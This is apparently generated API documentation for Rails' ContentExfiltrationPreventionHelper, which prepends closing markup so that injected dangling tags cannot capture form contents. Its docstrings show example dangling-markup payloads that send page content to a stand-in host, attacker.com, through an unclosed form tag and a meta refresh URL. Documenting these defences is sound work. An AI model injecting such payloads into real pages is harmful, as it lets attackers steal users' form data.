Module: ActionView::Helpers::ContentExfiltrationPreventionHelper

Relationships & Source Files
Extension / Inclusion / Inheritance Descendants
Included In: `::ActionDispatch::DebugView`, `::ActionView::Base`, `::ActionView::Helpers`, `FormHelper`, `FormTagHelper`, `Tags::Base`, `Tags::CheckBox`, `Tags::CollectionCheckBoxes`, `Tags::CollectionRadioButtons`, `Tags::CollectionSelect`, `Tags::ColorField`, `Tags::DateField`, `Tags::DateSelect`, `Tags::DatetimeField`, `Tags::DatetimeLocalField`, `Tags::DatetimeSelect`, `Tags::EmailField`, `Tags::FileField`, `Tags::GroupedCollectionSelect`, `Tags::HiddenField`, `Tags::Label`, `Tags::MonthField`, `Tags::NumberField`, `Tags::PasswordField`, `Tags::RadioButton`, `Tags::RangeField`, `Tags::SearchField`, `Tags::Select`, `Tags::TelField`, `Tags::TextArea`, `Tags::TextField`, `Tags::TimeField`, `Tags::TimeSelect`, `Tags::TimeZoneSelect`, `Tags::UrlField`, `Tags::WeekField`, `Tags::WeekdaySelect`, `UrlHelper`, `::ActionView::TestCase`, `::ActionView::TestCase::Behavior`
Defined in:	actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

Constant Summary

CLOSE_CDATA_COMMENT =

Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents.

For example, an attacker might inject:

<p>The HTML following this tag, up until the next <tt> or the end of the document would be captured by the attacker's </tt>. By closing any open textarea tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L32-L32'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 32</a> <pre class='code ruby'><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'></span><span class='tstring_end'>"</span></span>.<span class='id identifier rubyid_html_safe'>html_safe</span>.<span class='id identifier rubyid_freeze'>freeze</span></pre> </li> <li> <span id='CLOSE_FORM_TAG-constant' class='summary_signature'>CLOSE_FORM_TAG =</span> <div class='docstring'> <div class='discussion'> <p>Close any open form tags before each new form tag. This prevents attackers from injecting unclosed forms that could leak markup offsite.</p> <p>For example, an attacker might inject:</p> <form action="https://attacker.com"> <p>The form elements following this tag, up until the next <tt></form></tt> would be captured by the attacker's <tt><form></tt>. By closing any open form tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L57-L57'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 57</a> <pre class='code ruby'><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'></form></span><span class='tstring_end'>"</span></span>.<span class='id identifier rubyid_html_safe'>html_safe</span>.<span class='id identifier rubyid_freeze'>freeze</span></pre> </li> <li> <span id='CLOSE_OPTION_TAG-constant' class='summary_signature'>CLOSE_OPTION_TAG =</span> <div class='docstring'> <div class='discussion'> <p>Close any open option tags before each form tag. This prevents attackers from injecting unclosed options that could leak markup offsite.</p> <p>For example, an attacker might inject:</p> <form action="https://attacker.com"><option> <p>The HTML following this tag, up until the next <tt></option></tt> or the end of the document would be captured by the attacker's <tt><option></tt>. By closing any open option tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L45-L45'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 45</a> <pre class='code ruby'><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'></option></span><span class='tstring_end'>"</span></span>.<span class='id identifier rubyid_html_safe'>html_safe</span>.<span class='id identifier rubyid_freeze'>freeze</span></pre> </li> <li> <span id='CLOSE_QUOTES_COMMENT-constant' class='summary_signature'>CLOSE_QUOTES_COMMENT =</span> <div class='docstring'> <div class='discussion'> <p>Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.</p> <p>For example, an attacker might inject:</p> <pre class="code ruby"><code class="ruby"><span class='op'><</span><span class='id identifier rubyid_meta'>meta</span> <span class='id identifier rubyid_http'>http</span><span class='op'>-</span><span class='id identifier rubyid_equiv'>equiv</span><span class='op'>=</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>refresh</span><span class='tstring_end'>"</span></span> <span class='id identifier rubyid_content'>content</span><span class='op'>=</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>0;URL=https://attacker.com?</span></code></pre> <p>The HTML following this tag, up until the next single quote would be sent to <a href="https://attacker.com" target="_parent" title="https://attacker.com">https://attacker.com</a>. By closing any open attributes, we ensure that form contents are never exfiltrated this way.</p> </div> </div> <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L18-L18'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 18</a> <pre class='code ruby'><span class='tstring'><span class='tstring_beg'>%q(</span><span class='tstring_content'></span><span class='tstring_end'>)</span></span>.<span class='id identifier rubyid_html_safe'>html_safe</span>.<span class='id identifier rubyid_freeze'>freeze</span></pre> </li> <li> <span id='CONTENT_EXFILTRATION_PREVENTION_MARKUP-constant' class='summary_signature'>CONTENT_EXFILTRATION_PREVENTION_MARKUP =</span> <br/> <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L59-L59'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 59</a> <pre class='code ruby'>(<span class='const'><a href="#CLOSE_QUOTES_COMMENT-constant" title="ActionView::Helpers::ContentExfiltrationPreventionHelper::CLOSE_QUOTES_COMMENT (constant)">CLOSE_QUOTES_COMMENT</a></span> <span class='op'>+</span> <span class='const'><a href="#CLOSE_CDATA_COMMENT-constant" title="ActionView::Helpers::ContentExfiltrationPreventionHelper::CLOSE_CDATA_COMMENT (constant)">CLOSE_CDATA_COMMENT</a></span> <span class='op'>+</span> <span class='const'><a href="#CLOSE_OPTION_TAG-constant" title="ActionView::Helpers::ContentExfiltrationPreventionHelper::CLOSE_OPTION_TAG (constant)">CLOSE_OPTION_TAG</a></span> <span class='op'>+</span> <span class='const'><a href="#CLOSE_FORM_TAG-constant" title="ActionView::Helpers::ContentExfiltrationPreventionHelper::CLOSE_FORM_TAG (constant)">CLOSE_FORM_TAG</a></span>).<span class='id identifier rubyid_freeze'>freeze</span></pre> </li> </ul> </div> <h2 class='h2_sum' id='class_attribute_summary'>Class Attribute Summary</h2> <div class='div_sum'> <ul class='summary full'> <li> <span class='summary_signature rw'> <a href="#prepend_content_exfiltration_prevention-class_method" title=".prepend_content_exfiltration_prevention (class method)">.<strong>prepend_content_exfiltration_prevention</strong> </a> (also: #prepend_content_exfiltration_prevention) </span> <span class='note title rw'>rw</span> </li> </ul> </div>  <h2 class='h2_sum' id='instance_attribute_summary'>Instance Attribute Summary</h2> <div class='div_sum'> <ul class='summary full'> <li> <span class='summary_signature rw'> <a href="#prepend_content_exfiltration_prevention-instance_method" title="#prepend_content_exfiltration_prevention (instance method)">#<strong>prepend_content_exfiltration_prevention</strong> </a> </span> <span class='note title rw'>rw</span> </li> </ul> </div>  <h2 class='h2_sum' id='instance_method_summary'>Instance Method Summary</h2> <div class='div_sum'> <ul class='summary full'> <li> <span class='summary_signature '> <a href="#prevent_content_exfiltration-instance_method" title="#prevent_content_exfiltration (instance method)">#<strong>prevent_content_exfiltration</strong>(html) </a> </span> </li> </ul> </div>  <h2 class='y_details'>Class Attribute Details</h2> <section class='method_details first' id="prepend_content_exfiltration_prevention-class_method"> <h3 class='signature rw first'> .<strong>prepend_content_exfiltration_prevention</strong> <span class="extras">(<span class='rw'>rw</span>)</span> <span class='aliases'>Also known as: <span class='names'>#prepend_content_exfiltration_prevention</span></span> </h3> <span class='link_repo'>[ <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L6-L6'>GitHub</a> ]</span> <div class='source_code h'> <pre class='lines_num' data-start='6' data-end='6'></pre> <div class='lines_code'> <pre><span class='info file'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6</span></pre> <pre class='code ruby'> <span class='id identifier rubyid_mattr_accessor'>mattr_accessor</span> <span class='symbeg'>:</span><span class='id identifier rubyid_prepend_content_exfiltration_prevention'>prepend_content_exfiltration_prevention</span><span class='comma'>,</span> <span class='label'>default:</span> <span class='kw'>false</span> </pre> </div> </div> </section> <h2 class='y_details'>Instance Attribute Details</h2> <section class='method_details first' id="prepend_content_exfiltration_prevention-instance_method"> <h3 class='signature rw first'> #<strong>prepend_content_exfiltration_prevention</strong> <span class="extras">(<span class='rw'>rw</span>)</span> </h3> <span class='link_repo'>[ <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L6-L6'>GitHub</a> ]</span> <div class='source_code h'> <pre class='lines_num' data-start='6' data-end='6'></pre> <div class='lines_code'> <pre><span class='info file'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6</span></pre> <pre class='code ruby'> <span class='id identifier rubyid_mattr_accessor'>mattr_accessor</span> <span class='symbeg'>:</span><span class='id identifier rubyid_prepend_content_exfiltration_prevention'>prepend_content_exfiltration_prevention</span><span class='comma'>,</span> <span class='label'>default:</span> <span class='kw'>false</span> </pre> </div> </div> </section> <h2 class='y_details'>Instance Method Details</h2> <section class='method_details first' id="prevent_content_exfiltration-instance_method"> <h3 class='signature first'> #<strong>prevent_content_exfiltration</strong>(html) </h3> <span class='link_repo'>[ <a class='repo' href='https://github.com/rails/rails/blob/main/actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb#L61-L67'>GitHub</a> ]</span> <div class='source_code h'> <pre class='lines_num' data-start='61' data-end='67'></pre> <div class='lines_code'> <pre><span class='info file'># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 61</span></pre> <pre class='code ruby'> <span class='kw'>def</span> <span class='id identifier rubyid_prevent_content_exfiltration'>prevent_content_exfiltration</span>(<span class='id identifier rubyid_html'>html</span>) <span class='kw'>if</span> <span class='id identifier rubyid_prepend_content_exfiltration_prevention'><a href="#prepend_content_exfiltration_prevention-class_method" title="ActionView::Helpers::ContentExfiltrationPreventionHelper.prepend_content_exfiltration_prevention (method)">prepend_content_exfiltration_prevention</a></span> <span class='const'><a href="#CONTENT_EXFILTRATION_PREVENTION_MARKUP-constant" title="ActionView::Helpers::ContentExfiltrationPreventionHelper::CONTENT_EXFILTRATION_PREVENTION_MARKUP (constant)">CONTENT_EXFILTRATION_PREVENTION_MARKUP</a></span> <span class='op'>+</span> <span class='id identifier rubyid_html'>html</span> <span class='kw'>else</span> <span class='id identifier rubyid_html'>html</span> <span class='kw'>end</span> <span class='kw'>end</span> </pre> </div> </div> </section> <div id='footer'></div> </div>  </div>  </body> </html>